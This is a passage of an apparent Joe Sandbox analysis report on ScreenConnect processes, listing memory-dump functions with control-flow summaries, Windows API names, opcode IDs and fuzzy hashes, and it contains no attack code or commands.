                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                    control_flow_graph 365 7ffaac45f67b-7ffaac45f710 370 7ffaac45f71a-7ffaac45f7ba CreateFileW 365->370 371 7ffaac45f712-7ffaac45f717 365->371 373 7ffaac45f7bc 370->373 374 7ffaac45f7c2-7ffaac45f7f5 370->374 371->370 373->374
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1571407783.00007FFAAC450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC450000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffaac450000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CreateFile
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 823142352-0
                                                                                                                                                                                                                                                                    • Opcode ID: ef750e298dc935e2f0435bf4eb61b2960acab1e7308ab6f6deb115ae447eef82
                                                                                                                                                                                                                                                                    • Instruction ID: abdc122b1efbbf2ad6801b19e62690b67d409a2a11fa30761efd1f7cb8985117
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ef750e298dc935e2f0435bf4eb61b2960acab1e7308ab6f6deb115ae447eef82
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B651917190CA5C8FEB68DF58D849BE9BBE0FB59314F1441AEE04DD3252CB34A845CB81

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                    control_flow_graph 466 7ffaac4584b8-7ffaac458550 SetProcessMitigationPolicy 469 7ffaac458558-7ffaac458587 466->469 470 7ffaac458552 466->470 470->469
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1571407783.00007FFAAC450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC450000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffaac450000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: MitigationPolicyProcess
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 1088084561-0
                                                                                                                                                                                                                                                                    • Opcode ID: 03e5658e8c13cf9d80e2e7458a6d951db040932c65722eb409eed00db6274168
                                                                                                                                                                                                                                                                    • Instruction ID: 6ae06b198909ed2372e9a3624e215c88d74c9b77677bfc9a2c3abbf8c8f2c125
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 03e5658e8c13cf9d80e2e7458a6d951db040932c65722eb409eed00db6274168
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3831D77191CB188FDB28DF9CDC4A9F9BBE0EB55711F00412FE44AD3252DB74A8458B81

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                    control_flow_graph 472 7ffaac453eaa-7ffaac4584ef 474 7ffaac4584f6-7ffaac458550 SetProcessMitigationPolicy 472->474 475 7ffaac458558-7ffaac458587 474->475 476 7ffaac458552 474->476 476->475
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1571407783.00007FFAAC450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC450000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffaac450000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: MitigationPolicyProcess
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 1088084561-0
                                                                                                                                                                                                                                                                    • Opcode ID: 920d9d97a544a3d577a17ff3ca0e3c0eccc1c85185d4b0158d955390879b6e75
                                                                                                                                                                                                                                                                    • Instruction ID: 3a90cf094fbbbad0c35cbe15fd3eaed28466402bfcebbd5c5d67a0ff1f1d59a7
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 920d9d97a544a3d577a17ff3ca0e3c0eccc1c85185d4b0158d955390879b6e75
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EB21B97191CB188FDB189F9DDC4A9F97BE0EB55711F00413EE04AD3251DB74B8458B91
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1571407783.00007FFAAC450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC450000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffaac450000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CloseHandle
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2962429428-0
                                                                                                                                                                                                                                                                    • Opcode ID: 9c647c9c32868dc47efbc9d8272ceccc62eb8a5bc0171a5312393f4ff219b868
                                                                                                                                                                                                                                                                    • Instruction ID: 3b256dd2507a455eabbafd491b05d079cb0cf394b607c364acdc986874e0cd72
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9c647c9c32868dc47efbc9d8272ceccc62eb8a5bc0171a5312393f4ff219b868
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F021D671908A1C9FDB58DF58C449BF9BBE0FB65321F00422ED04ED3651DB71A856CB90
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.1566810300.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_10a0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: t*;u$t*;u
                                                                                                                                                                                                                                                                    • API String ID: 0-727745153
                                                                                                                                                                                                                                                                    • Opcode ID: 06a6779a26b32fa90728084ddd81dff57a64e0c32ceb9ecdda1ec93358af3509
                                                                                                                                                                                                                                                                    • Instruction ID: 5e1d12e918c8d18ef3988c95be3f303ec7eee328e25db1f8a45767c28bfb8592
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 06a6779a26b32fa90728084ddd81dff57a64e0c32ceb9ecdda1ec93358af3509
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1911A171F00205AFEB64CEA9DC40AAFB7F6BFC8610F54C565E584D7260E77299028B90
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.1566810300.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_10a0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: $q$$q
                                                                                                                                                                                                                                                                    • API String ID: 0-3126353813
                                                                                                                                                                                                                                                                    • Opcode ID: 4f6ce1ac6eef309a5c54ebd9f2c74bf53ae14963c89b226e285df4153e3f611a
                                                                                                                                                                                                                                                                    • Instruction ID: d3e7c172072086b8d76f5fc2eb621f40bba13b3357f41d33d4b1148abec0aa64
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4f6ce1ac6eef309a5c54ebd9f2c74bf53ae14963c89b226e285df4153e3f611a
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DC014934A00304CFE7259B75E40C6267BF6FF45611B1640EBE885CB226DB35DC02CB41
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.1566810300.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_10a0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 0-76226702
                                                                                                                                                                                                                                                                    • Opcode ID: a1f5cd46012da9e4cf837c15edca717f27b8befb034c452356217d0a2ef86151
                                                                                                                                                                                                                                                                    • Instruction ID: bdd5bef7db0bbcb8819538100ba677432d20f00046a985eeccfee1a33997f286
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a1f5cd46012da9e4cf837c15edca717f27b8befb034c452356217d0a2ef86151
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8B51D2347003018FD715EB79D8946AE7BF2AF89210B5485B9E586CB365EF35DC02CB90
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.1566810300.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_10a0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: (q
                                                                                                                                                                                                                                                                    • API String ID: 0-2414175341
                                                                                                                                                                                                                                                                    • Opcode ID: 6bf373b2fb0852004b4cbe19bdb69aa879372f9185d05181d5bd7a2d45e09dbc
                                                                                                                                                                                                                                                                    • Instruction ID: ef897abac7b4ed2001f10585ec613cf7fc506642b30d9e9704c0c6fbfd662aea
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6bf373b2fb0852004b4cbe19bdb69aa879372f9185d05181d5bd7a2d45e09dbc
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8F612978B106059FDB14DFA9E894A9EB7F2FF8D214B508198E5469F325DB30EC02DB40
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.1566810300.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_10a0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: LRq
                                                                                                                                                                                                                                                                    • API String ID: 0-3187445251
                                                                                                                                                                                                                                                                    • Opcode ID: 395cfb52f281026b06c242d58e794c7fb16bd8976985bf5db946274fe5c59c32
                                                                                                                                                                                                                                                                    • Instruction ID: 33048656b47c588a174bd4c12c589f47509179af20ea93a596e742375e7e688c
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 395cfb52f281026b06c242d58e794c7fb16bd8976985bf5db946274fe5c59c32
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B1510530B00214DFDB259BA8D854B6EBBF2BF84310F14C56AE996DB2A5DB36DC44C781
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.1566810300.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_10a0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: (q
                                                                                                                                                                                                                                                                    • API String ID: 0-2414175341
                                                                                                                                                                                                                                                                    • Opcode ID: 914ea462f78813c92da1d007b5ec27d5e06b4f5e8889208cf2ee415e23392d03
                                                                                                                                                                                                                                                                    • Instruction ID: 9c20d11309a64f973406736040e7e8e40e4c4ebc46223b65939edcf414535f43
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 914ea462f78813c92da1d007b5ec27d5e06b4f5e8889208cf2ee415e23392d03
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1041D235A002058BEB24EFA4E4946ADBBB6FFC4310F48C169E9459F249DF75A803CB91
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.1566810300.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_10a0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: ['
                                                                                                                                                                                                                                                                    • API String ID: 0-410297704
                                                                                                                                                                                                                                                                    • Opcode ID: 7f1ea21a8cae6705dcfebe4cfd2583252450da644f148fde5f5097accdab3653
                                                                                                                                                                                                                                                                    • Instruction ID: a8972592cf00157aa7c2f093aaa97c694afa12d02eb9521fc983f28eda196aef
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7f1ea21a8cae6705dcfebe4cfd2583252450da644f148fde5f5097accdab3653
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EC31F638B003215B9725ABBDD89049EB7E6FB892103404B28D459DF344EF30FD068BD1
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.1566810300.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_10a0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: t*;u
                                                                                                                                                                                                                                                                    • API String ID: 0-3961405802
                                                                                                                                                                                                                                                                    • Opcode ID: ed6839d38dccfb636a30af376f671fcbcc38c494188944a76747b9cc5a788e38
                                                                                                                                                                                                                                                                    • Instruction ID: 06939f9088bf60c19d66d6598a0493c02dcb98c280a86855e42003a7573cfaf0
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ed6839d38dccfb636a30af376f671fcbcc38c494188944a76747b9cc5a788e38
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9B116176E00214ABEB20CEA9DC40BEAB7F5FF88710F54C5A5E594D7250E7719902CB90
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.1566810300.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_10a0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: b6b91bc622282d3da89b1e5c2eac54150432e5acfe4335f714be1a2b5276b958
                                                                                                                                                                                                                                                                    • Instruction ID: f3d4b1d2b8579ad0559546e9b08269763f3021a38fa5e03e7dce195d9b80888f
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b6b91bc622282d3da89b1e5c2eac54150432e5acfe4335f714be1a2b5276b958
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3551AF35D103199FEB11EFB4E8517DDBBB1EF89300F508165E044AB294EB359886CB61
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.1566810300.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_10a0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 52d89937231bffc66d427302372eec56814891e7f9be6cb9b512273400e0eef8
                                                                                                                                                                                                                                                                    • Instruction ID: 61119ce9ad0c16d407683612fa860b7c5a0a09189938f7a28e53621d593bfa69
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 52d89937231bffc66d427302372eec56814891e7f9be6cb9b512273400e0eef8
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DB51BE34E003198FDB11DFB5E844BDDBBB1FF88310F50866AE144AB294EB35A886CB50
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.1566810300.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_10a0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: d9d602a4086cd6591db947955bd3548df3c3348ba2a2af3db94fc26d9a2ba568
                                                                                                                                                                                                                                                                    • Instruction ID: aacef08e3b78c110bb382f106f3746020112f63a040bf66969001036c5e66590
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d9d602a4086cd6591db947955bd3548df3c3348ba2a2af3db94fc26d9a2ba568
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D7512A386007018FD734CF69D494A56B7F2FF8D624B544A5CE49ACB7A4DB71E802CB44
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.1566810300.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_10a0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: a8a1fa27ac6b257cefa7156a7ee49027e9015d7b04b646506f6c414a569b61cd
                                                                                                                                                                                                                                                                    • Instruction ID: 13ec95b6932094dca41c767e67c96fb8103e451dc5d8000efae021b008da6547
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a8a1fa27ac6b257cefa7156a7ee49027e9015d7b04b646506f6c414a569b61cd
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 69414A74A007068FDB74CF79D84469EBBF1FF48710B108A68E496DB6A4EB30E845CB90
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.1566810300.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_10a0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: f1f0967650d85f7c1d16a0b1f2793a3217a9829f6c90d4e81ad730cdbf30d126
                                                                                                                                                                                                                                                                    • Instruction ID: c36012090b3d10d1572190a02d893440b6aeb8910084a8a6cf8d03eb40cfb763
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f1f0967650d85f7c1d16a0b1f2793a3217a9829f6c90d4e81ad730cdbf30d126
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CA414A74A00706CFDB74CF69D44469ABBF1FF48710B148A68E496DB6A4EB31E845CB90
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.1566810300.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_10a0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: fcaa3c20119d155bd3408c8c48315da11299b115aa17b3279ce01a8fbddde6c3
                                                                                                                                                                                                                                                                    • Instruction ID: 7dcaa77b201d8f9a385df892e6016f188c1995f8a2b169f58a1e95749b3f1ba8
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fcaa3c20119d155bd3408c8c48315da11299b115aa17b3279ce01a8fbddde6c3
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 55318D31B002058FEB24DFA9C4946AFF7F5EF8A354F10946AE50AEB690DB309C018B90
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.1566810300.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_10a0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 96c1fa66792f793ff12c4b1e66ddf4f04fc19af04752a4f9d940386399b60beb
                                                                                                                                                                                                                                                                    • Instruction ID: fc76d388b457ef01235e7d4d0b612246ef50b766141e0b202b0c94655b782f84
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 96c1fa66792f793ff12c4b1e66ddf4f04fc19af04752a4f9d940386399b60beb
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B631AFABC153519BE3215E78CE5B3847EE0CFB3018B1C4256C688E5E4AE75CE2048796
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.1566810300.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_10a0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 8b6e20490f5ab14a686b2d5494250cac7d870d68682e2e5a360fe6645edc7de9
                                                                                                                                                                                                                                                                    • Instruction ID: cec2920ce9ee12a76114597bfce7ca48d0852a07e31b1bd38952cf35cf142411
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8b6e20490f5ab14a686b2d5494250cac7d870d68682e2e5a360fe6645edc7de9
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2931EE70F042068FDB14DBA8D8546AEFBB6FFC9210B1481AAD949EF380DA309D02C791
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.1566810300.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_10a0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: c7a9a2e60782f7e1db3c686929c494688098c1b6543083f6f7ec3f41a2b983c2
                                                                                                                                                                                                                                                                    • Instruction ID: 1e5b0212faba3ff901a3fa41a1c396802726c335e361335c4490f6b14f2e9ea7
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c7a9a2e60782f7e1db3c686929c494688098c1b6543083f6f7ec3f41a2b983c2
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 65314934A007018FD770CF69D884A6AB7F2FF89720B544A6CE496CB7A5D731E805CB91
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.1566810300.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_10a0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 8b149d11c15b939ed2fbec5f60dfb00e9425044da18ee70f551f1338016a6750
                                                                                                                                                                                                                                                                    • Instruction ID: a7102cd46975061574457795ed4edc7a626b0e39350abccd1a00a6167ab363b3
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8b149d11c15b939ed2fbec5f60dfb00e9425044da18ee70f551f1338016a6750
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D0316B31E00219DFCF14DFA8E8809CDBBB6FF89305B10842AE5057B260DB35A906CBA0
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.1566810300.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_10a0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 3cebf8fbca9a40d3a3ae6655075ed3f532bd03f8f3e6bfdd561bf9cd4d330c1c
                                                                                                                                                                                                                                                                    • Instruction ID: ca818c31e6c64f53cade56b1792fef44fcf76ef87c41db495bd48a964edfd029
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3cebf8fbca9a40d3a3ae6655075ed3f532bd03f8f3e6bfdd561bf9cd4d330c1c
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2F11A279B002515BD724EB78E8907AE7BF2FBC5210F449629E449AF390DF70AD0687E1
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.1566810300.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_10a0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 066a11a3c1ee7d954fc4ce507ca6ff5e97b237db962c90983a265b36e6394571
                                                                                                                                                                                                                                                                    • Instruction ID: c60285ae254178f14c29283f01cfe4dc472383d6bed6661e549ab98b230e155a
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 066a11a3c1ee7d954fc4ce507ca6ff5e97b237db962c90983a265b36e6394571
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5C214A346007058FD774CF6AC84869ABBF1EF44320F048B6CE5D69B6A5DB71A94ACF90
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.1566810300.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
